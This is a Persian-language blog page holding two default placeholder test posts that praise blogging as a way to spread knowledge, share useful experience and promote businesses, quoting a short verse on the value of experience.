این متن دومین مطلب آزمایشی من است که به زودی آن را حذف خواهم کرد.

زکات علم، نشر آن است. هر وبلاگ می تواند پایگاهی برای نشر علم و دانش باشد. بهره برداری علمی از وبلاگ ها نقش بسزایی در تولید محتوای مفید فارسی در اینترنت خواهد داشت. انتشار جزوات و متون درسی، یافته های تحقیقی و مقالات علمی از جمله کاربردهای علمی قابل تصور برای ,بلاگ ها است.

همچنین وبلاگ نویسی یکی از موثرترین شیوه های نوین اطلاع رسانی است و در جهان کم نیستند وبلاگ هایی که با رسانه های رسمی خبری رقابت می کنند. در بعد کسب و کار نیز، روز به روز بر تعداد شرکت هایی که اطلاع رسانی محصولات، خدمات و رویدادهای خود را از طریق بلاگ انجام می دهند افزوده می شود.

۱ نظر

رویا زرد

عنوان اولین مطلب آزمایشی من

۱۳ خرداد۰۰

این متن اولین مطلب آزمایشی من است که به زودی آن را حذف خواهم کرد.

مرد خردمند هنر پیشه را، عمر دو بایست در این روزگار، تا به یکی تجربه اندوختن، با دگری تجربه بردن به کار!

اگر همه ما تجربیات مفید خود را در اختیار دیگران قرار دهیم همه خواهند توانست با انتخاب ها و تصمیم های درست تر، استفاده بهتری از وقت و عمر خود داشته باشند.

همچنین گاهی هدف از نوشتن ترویج نظرات و دیدگاه های شخصی نویسنده یا ابراز احساسات و عواطف اوست. برخی هم انتشار نظرات خود را فرصتی برای نقد و ارزیابی آن می دانند. البته بدیهی است کسانی که دیدگاه های خود را در قالب هنر بیان می کنند، تاثیر بیشتری بر محیط پیرامون خود می گذارند.

۰ نظر

رویا زرد

جدیدترین مطالب مطالب جدید تر